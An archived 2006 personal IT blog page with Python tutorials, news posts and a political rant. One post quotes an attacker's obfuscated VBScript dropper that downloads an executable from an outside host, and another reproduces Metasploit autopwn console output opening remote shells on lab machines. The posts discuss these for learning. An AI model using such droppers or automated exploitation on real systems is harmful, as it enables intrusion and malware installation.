Archive

Archive for September, 2006

New Vista Available for General Download

September 24th, 2006 No comments

Microsoft has made Vista RC1 Update (Build 5728) available online, apparently for a limited time only. Anyone wishing to download it can grab it from here.

I know previously it was only installable on Virtual PC and that VMWare gave a lot of headaches.... I'm going to try it on VMWare when I finish the download and I'll post a write-up on how it went and if it was possible what settings I used.

Peace,
HT

Categories: IT Tags:

Sometimes even I’m ashamed to be Canadian…

September 23rd, 2006 1 comment

For those that know me personally I'm a strong nationalist... I'm proud of my country and it's accomplishments, even if I was born before many of them took place....

However, when I came home from work today I sat down and read the paper... I was shocked... horrified... and almost suicidal after reading an article... It was so depressing... a "Reporter".... perhaps "Fairy Tale Author" would be a better term since she put The Brothers Grimm and Mother Goose to shame ... had the gall to not report but give commentary... Now commentary is generally good... The commentators are humourous or serious and to the point... but not this "Fairy Tale Author".... I'm guessing it was about an hour before her deadline and she still had nothing so she chose to rant (much like I'm doing now). The difference was that she went to Google and typed in a search along the lines of "longest words in the english language"... she has some great flowerly statements in there... it could be poetry if she wasn't trying so hard to make it a newspaper article...

To sum the article up -- "So many words, so little said"

Here are a few examples for those of you not brave enough to visit the actual article:

There is nothing quixotictipping at windmills dreamy — about the security and stabilization mission to Afghanistan.

They don't fight like them, they aren't drawn from a broad arc of ethnic groups and tribal alliances like them, and they're not nationally, passionately, esteemed as valiant warriors like them.

Or further, even more ignobly, that this struggle is not in our interest — not worth the blood of Canadian men and women — and that we should disengage forthwith, concentrate our resources, in treasure and troops, elsewhere. (But elsewhere, be it Darfur or Haiti — or whatever bright object of humanitarian need might captivate the likes of Jack Layton — would lose its thrall, you can bet on it, as soon as Canadian troops started dying there, too.)

But we're making a grandiose and mythical enemy out of the Taliban, as if this faction is an opponent that can't be dislodged or even contained, prevented from sloshing over into all the other provinces where there has been no robust threat to the rehabilitation of Afghanistan.

This is dangerous defeatism and a self-fulfilling prophecy for the constituency that is isolationist at heart or reflexively opposed to any military intervention anywhere. They cloak their objections in the purported futility of Afghanistan — a morass in the making,

We are flirting with failure, not because that fate is foretold but because, five years (Long live the F)

Peace,
HT

PS: This blog will remain as IT Related as I can make it.... but this just had to be voiced.... and between this site and SpamMailBag, I've broken 10,000 visitors this month.... that seemed like a nice number of people to try and reach with this message... And thank you to my visitors.

Categories: Personal Tags:

Hackers in the House

September 23rd, 2006 No comments

A rather interesting link was sent out a couple days ago to the SecurityBasics mailing list.. It documents the actions taking by a "hacker" after they have gained access to an insecure Windows box.... While details of the exploit used and the system setup are not revealed it is still interesting to read through and see the actions that are performed... snort data and packet captures are included, however they've been heavily sanitized.

I would have to say that step 14 was by far the best as it includes some scripting that was written to a file.. When cleaned up the code looks a little more like this

execute(chr(8x)^&^chr(101)^&^chr(116)^&^chr(x2)^&^chr(120)^&^chr(80)^&^chr(111)^&^chr(115)^&^chr(116)^&^chr(x2)&^chr(61)^
&^chr(x2)^&^chr(67)^&^chr(11x)^&^chr(101)^&^chr(97)^&^chr(116)^&^chr(101)^&^chr(79)^&^chr(98)^&^chr(10)^&^chr(101)^&^
chr(99)^&^chr(116)^&^chr(x0)^&^chr(xx)^&^chr(77)^&^chr(105)^&^chr(99)^&^chr(11x)^&^chr(111)^&^chr115)^&^chr(111)^&
^chr(102)^&^chr(116)^&^chr(x6)^&^chr(88)^&^chr(77)^&^chr(76)^&^chr(72)^&^chr(8x)^&^chr(8x)^&^ch(80)^&^chr(xx)^&^chr(x1)
^&^chr(58)^&^chr(10))
xPost.Open ^"GET^",^"http://ZXMM.KMIP.NET:81/s.exe^",0
xPost.Send():Set sGet = CreateObject(^"ADODB.Stream^")
sGet.Mode =x
sGet.Type = 1:sGet.Open()
sGet.Write(xPost.responseBody)
sGet.SaveToFile ^"mt.exe^",2

Anyways.... it won't take overly long to read and it was definately worth the read.

Peace,
HT

Categories: IT, Security Tags:

Unofficial Patch Released for Latest IE 0Day

September 22nd, 2006 No comments

So the guys over at ZERT have released, what I believe is, their first patch since forming. The group... the Zeroday Emergency Response Team has out a patch for the IE VML 0Day (MS Advisory | Press | Source Code) that has been circulating. If you are interested in it you can download it from their website.

This has me thinking a lot about patch management and I'm going to put some thought into it tomorrow and publish it tomorrow night or Sunday morning.

Peace,
HT

Categories: IT, Security Tags:

Python Modules – Tar, Sys & String — Python Tutorial

September 21st, 2006 No comments

Yet another repost... I have nothing new to post at the moment... but all in due time.

Original (Remember even this one is over two years old... the others are three years.... I was still learning when I wrote these... but they're good for introducing the basics)
********************
Step-by-Step Process
********************
1. Open your favourite editor (Vi, Pico, Notepad, Wordpad, Textpad, DOS Edit).
2. Type (indentation lost -- email me if you need help)

code:

 """
Python Script to Deal with Tarballs Flags: c(ompress), d(compress), g(zip)
"""
import tarfile
import string
import sys
try : strFlags = sys.argv[1]
except :
strFlags = "-h"
decompress = "yes"
compress = "yes"
gzip = "yes"
if string.find(strFlags, "-") == 0 :
if string.find(strFlags, "h") != -1 :
print "Usage: %s -  " % sys.argv[0]
print "Flags: d[ecompress]n       c[ompress]n       g[zip]"
sys.exit(0)
try :
strArchive = sys.argv[2]
except :
print "Error Argument Missing"
sys.exit(0)
if string.find(strFlags, "d") == -1 :
decompress = "no"
if string.find(strFlags, "c") == -1 :
compress = "no"
if string.find(strFlags, "g") == -1 :
gzip = "no"
if compress == "yes" and decompress == "yes" :
print "ERROR - CANNOT DECOMPRESS AND COMPRESS"
sys.exit(0)
elif compress == "yes" and gzip == "no" :
try : strFile = sys.argv[3]
except :
print "Error Argument Missing"
sys.exit(0)
tarball = tarfile.open(strArchive, "w")
tarball.add(strFile)
tarball.close()
elif compress == "yes" and gzip == "yes" :
try : strFile = sys.argv[3]
except :
print "Error Argument Missing"
sys.exit(0)
tarball = tarfile.open(strArchive, "w:gz")
tarball.add(strFile)
tarball.close()
elif decompress == "yes" and gzip == "no" :
try:
tarball = tarfile.open(strArchive, "r")
except :
print "ERROR - FILE MISSING"
sys.exit(0)
for tarfile.tarinfo in tarball :
tarball.extract(tarfile.tarinfo)
tarball.close()
elif decompress == "yes" and gzip == "yes" :
try :
tarball = tarfile.open(strArchive, "r:gz")
except :
print "Error - File Missing"
sys.exit(0)
for tarfile.tarinfo in tarball :
tarball.extract(tarfile.tarinfo)
tarball.close()
else :
print "ERROR NO FLAGS GIVEN"
sys.exit(0)

3. Save the script as tar.py
4. Open a command prompt and type python tar.py -h
5. Now for the walk through.

We start off with a comment which is signified by 3 quotation marks

code:

 """


This is also how a comment is ended.
Following this we import the 3 modules we are going to use (tarfile, sys and string). We do so using the import statement. In previous tutorials we used import * from . This was done so that we wouldn't have to reference the module. However I now feel that you can keep up and reference the correct module, this is a more proper way of programming.

I have used a fair amount of error checking in this, so I will cover all those lines right no. While the error checking and the cod are by no means complete, I decided to cover some of it. I mentioned error checking in Introduction to Python #3 if you need to go back and look at it. Basically what it does is it tries to execute the code following try : and if it is successful it carries on with the rest of the program, however if the code fails (if the argument isn't present for example) then it runs the except : code, which prints and error and then uses sys.exit(0) to tell the program to exit cleanly.

Next I set a few variables equal to yes. I suppose I could have used 1/0 but yes/no worked easier for simplicity I wanted. Basically these three variables will store the values of our flags (on or off)

Now we'll check to see if we have a - to signify our flags. The code is slightly redundant here, it has already checked for the present argument and if it didn't exist it set it to -h (the first try and except). This is just making sure the - exists to be picky, if it doesn't the program will exit.
If the flag is set to -h (help) which as you can see makes use of %s to allow us to include the value of a variable in our string, as well as \n which represents a new line (for more info on either of these see Introduction to Python #2 and Introduction to Python #3.
The string.find(strFlags, -) command, simply checks to where the hyphen exists in the strFlags variable. If the - didn't exist a -1 would be returned, since it is in the first position the index of 0 is returned.
Next comes a collection of if statements (I explored if statements in the original Python Introduction

We are now into our tarfile module code. This is what we really want to explore. I have used three options since they will be most recognized, tar, untar, and gzip. The first thing we do every time is open the file we want to work with (this could be creation or an already existing file). We open a file by creating a variable to "store the file" (sorry, I'm a networking guy, not a programmer.. I'm not up on all the lingo).We use the tarfile.open to reference the file.. The first value passed to tarfile.open is the name of the archive we wish to open/create (in this case stored as strArchive), The second value is the mode (r[ead] or w[rite]). If we are dealing with gzip compression we add :gz to tell the module about the compression.
If we are compressing the file, it is rather simple we just access the file by referencing it's variable (tarball) and use the add function, which we pass the name of the file we are compressing, We then close our file stream (Hey I remember the word.. I think.. but i'm not changing it in case I'm wrong) and we close it by referencing the variable/stream (tarball) with the .close function.
If we are decompressing the file, we must decompress once for each file in the tar. We use a For statement (addressed in a previous tutorial i believe), if not it simple says for each file name in this file. We access the module fuction tarfile.tarinfo to find the names of the files in the archive. Then we use that name to extract it using the extract function on the filestream. Passing it the tarinfo function which stores the name of the current file in the archive.
We then close the filestream in the same way we did while compressing a file.

The only thing I didn't touch on was arguments. For you C/C++ programs, this should seem fairly familiar (at least based on my basic knowledge of those languages). sys.argv is an array that stores all the arguments. The first argument would be sys.argv[0], which would be the name of the script being executed, sys.argv[1] would be the name of the first argument following the script name. There is however no sys.argc function, to get the equivalent of argc in C/C++ you would have to use len(sys.argv).

Peace,
HT

Categories: IT, Python, Tutorials Tags:

Simplistic SMTP “HoneyPot” – Python Tutorial

September 20th, 2006 No comments

Here's another tutorial repost

Original
***********************
Step-by-Step Process
***********************
1. Open your favourite editor(Vi, Pico, Notepad, Wordpad, Textpad, DOS Edit).
2. Type

code:

 # Demonstrates various methods of importing modules.
from socket import *
import string
import time
# create a socket of the basic type.
s = socket(AF_INET, SOCK_STREAM)
# define our banner.
senddata1 = "220 desktop Microsoft ESMTP MAIL Service, Version 6.0.2600.1106 ready at" + time.strftime("%a, %d %b %Y %H:%M:%S %Z")
# Query the user for their IP Address and set that and the port
HOST = raw_input("Enter IP Address to bind socket to: ")
PORT = 25 s.bind((HOST, PORT))
# Bind the socket to an IP Address and Port
s.listen(1)
# Have the socket listen for a connection
(incomingsocket, address) = s.accept()
# Accept an incoming connection
incomingsocket.send(senddata1)
# Send our banner
straddress = str(address)
# Convert incoming address to a string
testlist = string.split(straddress, ",")
# Split the tuple into lists
gethost = string.split(testlist[0], "'")
# Split the host portion of the list
getaddr = string.split(testlist[1], ")")
# Split the port portion of the list
host = gethost[1]
# Remove just the address from the list
incomingport = int(getaddr[0])
# Remove just the port from the list
# define our Warning
senddata2 = "Illegal Access of this server, your IP [" + host +"] has been logged."
# Print connection information to the stdout
print "Connection attempt on port", PORT, "from", host, ":", incomingport
# Listen for incoming data
data = incomingsocket.recv(1024)
# Send the Warning
incomingsocket.send(senddata2)
# Close the socket incomingsocket.close

3. Save the script as honeypot.py
4. Open the command prompt and type python honeypot.py (If you get an error, you may already have port 25 in use, simply edit the file to change the port number.)
5. You will be prompted with Enter IP Address to bind socket to: Enter the IP address you wish to have the honey pot listen on. This could be 127.0.0.1 if you simply with to test it, or your outgoing IP if you wish to actually listen for connection attempts.You will now notice nothing, however you can telnet or nc to the IP you entered on port 25. Your connection will display the defined banner 220 desktop Microsoft ESMTP MAIL Service, Version 6.0.2600.1106 ready at followed by the current time (the %

This is only a single connect server and very basic, no complex commands. As time goes on I will post another tutorial on this same honey pot, only expanded to actually convince the user they are connected to the mail server.

The new commands in this tutorial include various socket commands, the time.strftime command and a few string commands.

time.strftime("format") - This command returns a string containing the time and date in the specified format.
str(non-string) - Converts a non-string to a string (there are also int() and tuple() commands).
string.split(string, delimitor) - Splits a string into a list at every delimitor. The list is then referenced by listname[list object number] (numbering begins at 0).

This script contains similar starting socket commands as my first Python Tutorial, however it includes a few extras. After accepting the connection, this script sends the banner using the incomingsocket.send command. This takes the variable we defined on the s.accept (socket accept command) and tells the computer to send data back to it. It then lists for data (incomingsocket.recv) with a maximum buffer size of 1024. Upon recieving this data it again transmits data to the connecting PC and closes the connect with incomingsocket.close.


Source: http://www.python.org/doc/lib/module-time.html
time.strftime format flags

%a Locale's abbreviated weekday name.
%A Locale's full weekday name.
%b Locale's abbreviated month name.
%B Locale's full month name.
%c Locale's appropriate date and time representation.
%d Day of the month as a decimal number [01,31].
%H Hour (24-hour clock) as a decimal number [00,23].
%I Hour (12-hour clock) as a decimal number [01,12].
%j Day of the year as a decimal number [001,366].
%m Month as a decimal number [01,12].
%M Minute as a decimal number [00,59].
%p Locale's equivalent of either AM or PM.
%S Second as a decimal number [00,61].
%U Week number of the year (Sunday as the first day of the week) as a decimal number [00,53]. All days in a new year preceding the first Sunday are considered to be in week 0.
%w Weekday as a decimal number [0(Sunday),6].
%W Week number of the year (Monday as the first day of the week) as a decimal number [00,53]. All days in a new year preceding the first Monday are considered to be in week 0.
%x Locale's appropriate date representation.
%X Locale's appropriate time representation.
%y Year without century as a decimal number [00,99].
%Y Year with century as a decimal number.
%Z Time zone name (no characters if no time zone exists).
%% A literal "%" character.

Peace,
HT

Categories: IT, Python, Tutorials Tags:

Python 2.5 Released

September 19th, 2006 No comments

This is just a short post... Python 2.5 has been released... There are a few syntax changes that look like they're for the better... I'm interested to sit and play with it later.

From the release notes:

Categories: IT, Python, Tools Tags:

Python Introduction — Part 3

September 18th, 2006 No comments

The third installment -- originally posted here.

Before I jump into those there is another chart I would like to add. In my last tutorial I mentioned a new way to use the print command, to make it a little more C/C++ like. However I didn't realize that some users may not have C/C++ experience and not know about the % options. So here is a chart with all of your options.

quote:
Source: Python 101 - Beginning Python

d Signed integer decimal.
i Signed integer decimal.
o Unsigned octal.
u Unsigned decimal.
x Unsigned hexidecimal (lowercase).
X Unsigned hexidecimal (uppercase).
e Floating point exponential format (lowercase).
E Floating point exponential format (uppercase).
f Floating point decimal format.
F Floating point decimal format.
g Same as "e" if exponent is greater than -4 or less than precision, "f" otherwise.
G Same as "E" if exponent is greater than -4 or less than precision, "F" otherwise.
c Single character (accepts integer or single character string).
r String (converts any python object using repr()).
s String (converts any python object using str()).
% No argument is converted, results in a "%" character in the result.

Now on to our new lesson.

I would like to look at executing files located on your system. As I mentioned in the first tutorial I would like to keep this OS inspecific so we will deal with the ping command as it is universal. I will be using the count flag and I will use the windows flag which is -n, so *nix users must remember to change it to -c or they will get an error.

********************
Step-by-Step Process
********************
1. Open your favourite editor (Vi, Pico, Notepad, Wordpad, Textpad, DOS Edit).
2. Type 

code:


from os import *
count = input("Number of times to ping host: ")
host = raw_input("IP of host to ping: ")
pingcmd = "ping -n %i %s" % (count, host)
execute = popen(pingcmd)
results = execute.readlines()
execute.close()
length = len(results)
for x in range (length) :
print results[x]


3. Save the script as pingtest.py
4. Open a command prompt and type python pingtest.py
5. This one is a little more difficult to walk you threw. First you will see Number of times to ping host: . Enter a number and press enter. Then you will see IP of host to ping: . Enter an IP and again press enter. There will be a pause (the length of which will depend on how many times you told it to ping). Then you will see the standard output of a ping command written to the screen.

Now to walk you threw this script. We import the OS module and then query the user for the number of pings and the host to ping. Then we define our ping command using the same format as the print command. The next line actually executes the command followed by a line which reads the output of the command into a variable. We then close the variable which executed the command. The next line introduces another new command the len command, which returns the length. In this case since results in an array it returns the number of lines in the array. We then make use of the for command we learned in our last tutorial and have it print the actual content of the array, line by line. Notice the use of the whitespace again for the for command.

Alrighty.... moving on, I believe I promised you file reading/writing next. We'll work with a simple txt file.

********************
Step-by-Step Process
********************
1. Open your favourite editor (Vi, Pico, Notepad, Wordpad, Textpad, DOS Edit).
2. Type 

code:


print "File Write/Create Example."
filename = raw_input("File to Write To/Create: ")
openfile = file(filename, 'w')
print "Enter text to write to file (Type 'quit' to quit):"
line = ""
alllines = ""
while 1 :
line = raw_input()
if line == 'quit' :
break
alllines = alllines + line + "n"
file.write(openfile, alllines)
file.close(openfile)
print "You just wrote to a file, Now Let's see what you wrote."
print "File Read Example."
openfile = file(filename, 'r')
filedata =  openfile.readlines()
length = len(filedata)
for x in range(length) :
print filedata[x]
openfile.close


3. Save the script as filetest.py
4. Open a command prompt and type python filetest.py
5. When you run this program you will be prompted to enter a filename. Call the file anything you want. The next line of code then open's that file in write ('w') mode (will create it if it doesn't exist). The code then tells you to type your text, and declares to blank variables. The while 1 : is just a way of creating an infinite loop, so that every time the user hits enter, it moves to a new line of the file. The line is used to receive input, but we aren't prompting the user each time. The if statement introduces another new command, break. This will exit the loop upon seeing the string 'quit'. The next line of code simply concatenates the previous lines with the new line and then adds a newline character. After the user has entered quit we write to the file and close the file. You then see a few lines of text. The script them opens the file in read ('r') mode. We read the lines into an array and determine the number of lines like we did in our ping tutorial. We then enter a fore statement and print each line until we get to the end of the file. Then we close the file.

The last thing I promised for this tutorial was error handling. This is useful for small things like if you've forgotten to declare a variable and other such events. I can't think of a useful example at the moment, so I'll just go over the commands and if I think of some code later I'll add it.

Basically the commands are try and except.

Instead of just issuing the code, you try it. For example if you were attempting to read a file that didn't exist. The program would exit and return an error. However if you try and have an except...

code:


try :

except :
print "File doesn't exist."

Now if the file doesn't exist it will simple print File doesn't exist and continue on with the program.

Peace,
HT

Categories: IT, Python, Tutorials Tags:

Metasploit 3.0 Automated Exploitation

September 17th, 2006 No comments

H.D. Moore has released a great article on performing automated exploitation using Metasploit 3.0. To obtain the latest MSF 3.0 source code you require svn... To perform the actual exploitation you'll require Ruby, PostgreSQL and RubyGems. The article provides a great explaination of setting everything up and running the automated exploitation.. There's also console output to show you exactly what you type and what happens.. It's definately worth the read and once I play with it a bit, I'll be throwing my comments and results up here for everyone to read.

Peace,
HT

-----

Console Output:

-----

$ ./msfconsole

=[ msf v3.0-beta-2-svn
+ -- --=[ 102 exploits - 93 payloads
+ -- --=[ 17 encoders - 4 nops
=[ 13 aux

msf > load db_postgres
[*] Successfully loaded plugin: db_postgres

msf > db_create
dropdb: database removal failed: ERROR: database "metasploit3" does not exist
CREATE DATABASE
ERROR: table "hosts" does not exist
[ snip ]

msf > db_nmap -p 445 192.168.0.0/24

Starting Nmap 4.01 ( http://www.insecure.org/nmap/ ) at 2006-09-17 22:49 CDT

Interesting ports on destructo (192.168.0.2):
PORT STATE SERVICE
445/tcp open microsoft-ds

Interesting ports on WIN2000DB.lan (192.168.0.106):
PORT STATE SERVICE
445/tcp open microsoft-ds

Interesting ports on WINXPSP0.lan (192.168.0.108):
PORT STATE SERVICE
445/tcp open microsoft-ds

Interesting ports on WIN2000SP4.lan (192.168.0.139):
PORT STATE SERVICE
445/tcp open microsoft-ds

Nmap finished: 256 IP addresses (8 hosts up) scanned in 12.493 seconds
msf > db_services
[*] Service: host=192.168.0.2 port=445 proto=tcp state=up name=microsoft-ds
[*] Service: host=192.168.0.106 port=445 proto=tcp state=up name=microsoft-ds
[*] Service: host=192.168.0.108 port=445 proto=tcp state=up name=microsoft-ds
[*] Service: host=192.168.0.139 port=445 proto=tcp state=up name=microsoft-ds

msf > db_autopwn -p -t -e
[*] Analysis completed in 0.208992004394531 seconds (0 vulns / 0 refs)
[*] Matched auxiliary/dos/windows/smb/rras_vls_null_deref against 192.168.0.106:445...
[*] Matched auxiliary/dos/windows/smb/ms06_035_mailslot against 192.168.0.108:445...
[*] Matched auxiliary/dos/windows/smb/ms06_035_mailslot against 192.168.0.2:445...
[ snip ]
[*] Calling the vulnerable function...
[*] Calling the vulnerable function...
[*] Trying to exploit Windows 2000 LAN Manager
[*] Bound to 6bffd098-a112-3610-9833-46c3f87e345a:1.0@ncacn_np:192.168.0.139[\BROWSER] ...
[*] Building the stub data...
[*] Unexpected DCERPC fault 0x000006f7
[*] Calling the vulnerable function...
[*] Command shell session 4 opened (192.168.0.145:60778 -> 192.168.0.139:26188)
[*] Unexpected DCERPC fault 0x000006f7
[*] Calling the vulnerable function...
[*] Command shell session 5 opened (192.168.0.145:47380 -> 192.168.0.106:27700)

msf > sessions -l

Active sessions
===============

Id Description Tunnel
-- ----------- ------
1 Command shell 192.168.0.145:46858 -> 192.168.0.139:15441
2 Command shell 192.168.0.145:42700 -> 192.168.0.108:28199
3 Command shell 192.168.0.145:40966 -> 192.168.0.106:27915
4 Command shell 192.168.0.145:60778 -> 192.168.0.139:26188
5 Command shell 192.168.0.145:47380 -> 192.168.0.106:27700

msf > sessions -i 1
[*] Starting interaction with 1...

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:\WINNT\system32>

Categories: IT, Security Tags:

Site Related Google Groups

September 17th, 2006 No comments

So I've decided to add some GoogleGroups related to CDO and SpamMailBag... I'm not sure they'll get used but now at least they exist if anyone is interested in them.

The CDO Group can be used for anything.... Feel free to sign up.. if it gets some members I may actually do something with it.

The SpamMailBag.com group is primarily to target mail harvesters and see what happens....

Feel free to check them out and join them.

Peace,
HT

Categories: Site Related, SpamMailBag.com Tags: